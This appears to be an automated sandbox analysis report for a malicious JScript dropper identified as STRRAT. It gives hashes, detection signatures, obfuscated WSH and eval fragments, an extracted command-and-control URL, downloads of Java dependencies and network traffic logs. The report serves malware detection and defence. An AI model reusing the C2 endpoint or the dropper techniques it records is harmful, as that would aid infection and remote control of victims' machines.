Windows Analysis Report
8NR95Z54o9.js

Overview

General Information

Sample name: 8NR95Z54o9.js
renamed because original name is a hash value
Original sample name: dbab3d6f8c0c56ea0f463696b651aa3e93f5b19f.rl.js
Analysis ID: 1538416
MD5: 0bbebce60f58abbcc864f8baf65849ba
SHA1: dbab3d6f8c0c56ea0f463696b651aa3e93f5b19f
SHA256: f252f6e0d8f9f687751843dbc0be03d4f2ceb468e8453a4940d203f78cc5f04d
Tags: CVE-2014-3931, CVE-2021-44228, js, log4j, log4shell, ReversingLabs, strrat, user-NDA0E

Detection

STRRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected STRRAT
JavaScript source code contains call to eval containing suspicious API calls
JavaScript source code contains functionality to generate code involving a shell, file or stream
Potential malicious VBS/JS script found (suspicious encoded strings)
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected AllatoriJARObfuscator
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: 8NR95Z54o9.js Avira: detected
Source: javaw.exe.7560.1.memstrmin Malware Configuration Extractor: STRRAT {"C2 list": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5"}
Source: 8NR95Z54o9.js ReversingLabs: Detection: 42%
Source: 8NR95Z54o9.js Virustotal: Detection: 53%
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49895 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49910 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49911 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49917 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49924 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49940 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49950 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49962 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49978 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49979 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:49985 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49996 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50007 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50013 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50034 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50046 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50047 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50053 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50069 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50077 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50079 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50080 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50081 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50082 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50083 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50085 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50084 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50086 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:50087 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50088 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50089 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:50090 version: TLS 1.2

Software Vulnerabilities

Source: 8NR95Z54o9.js Argument value: ['"var tWtYcm = WSH.CreateObject("adodb.stream");"']
Source: 8NR95Z54o9.js Argument value: ['"var tWtYcm = WSH.CreateObject("adodb.stream");"', '"var ele = WSH.CreateObject("microsoft.xmldom").createElement("bsc");Array.prototype.nXt555h = eval"']
Source: 8NR95Z54o9.js Return value : ['"var tWtYcm = WSH.CreateObject("adodb.stream");"']
Source: 8NR95Z54o9.js Return value : ['"var tWtYcm = WSH.CreateObject("adodb.stream");"']
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 4x nop then cmp eax, dword ptr [ecx+04h] 1_2_021ECC98
Source: Joe Sandbox View IP Address: 199.232.192.209 199.232.192.209
Source: Joe Sandbox View IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View IP Address: 140.82.121.4 140.82.121.4
Source: Joe Sandbox View JA3 fingerprint: 026e5ca865ce1f09da3a81d8a4e3effb
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: repo1.maven.org
Source: global traffic DNS traffic detected: DNS query: github.com
Source: javaw.exe, 00000001.00000002.2964017700.0000000009768000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.00000000097FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.00000000097FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
Source: javaw.exe, 00000001.00000002.2964017700.0000000009768000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.00000000097FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: javaw.exe, 00000001.00000002.2964017700.0000000009804000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: javaw.exe, 00000001.00000002.2964017700.0000000009804000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
Source: javaw.exe, 00000001.00000002.2964017700.0000000009768000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: javaw.exe, 00000001.00000002.2964017700.000000000980B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5
Source: javaw.exe, 00000001.00000003.1834325039.0000000014CED000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.2843934028.0000000014CCC000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1834372032.0000000014D01000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.2844738512.0000000014D23000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2971320672.0000000014D2A000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 00000001.00000002.2964017700.00000000097FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: javaw.exe, 00000001.00000002.2964017700.0000000009768000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009799000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://policy.camerfirma.com
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://policy.camerfirma.com0
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: javaw.exe, 00000001.00000002.2964017700.0000000009762000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009795000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.allatori.com
Source: javaw.exe, 00000001.00000002.2964017700.0000000009B9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.chambersign.org
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.chambersign.org1
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: javaw.exe, 00000001.00000002.2960804744.000000000455C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004356000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004294000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004243000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004409000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: javaw.exe, 00000001.00000002.2960804744.0000000004409000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: javaw.exe, 00000001.00000002.2960804744.0000000004210000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004200000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.000000000446F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.00000000043D9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004449000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.000000000459A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.000000000438E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004504000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.00000000042D6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004326000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2960804744.0000000004243000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org
Source: javaw.exe, 00000001.00000002.2960804744.0000000004243000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar
Source: javaw.exe, 00000001.00000002.2960804744.0000000004243000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar
Source: javaw.exe, 00000001.00000002.2960804744.00000000042D6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2972366837.0000000015318000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2972089591.0000000015168000.00000004.00000001.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2964017700.0000000009750000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu
Source: javaw.exe, 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50081
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
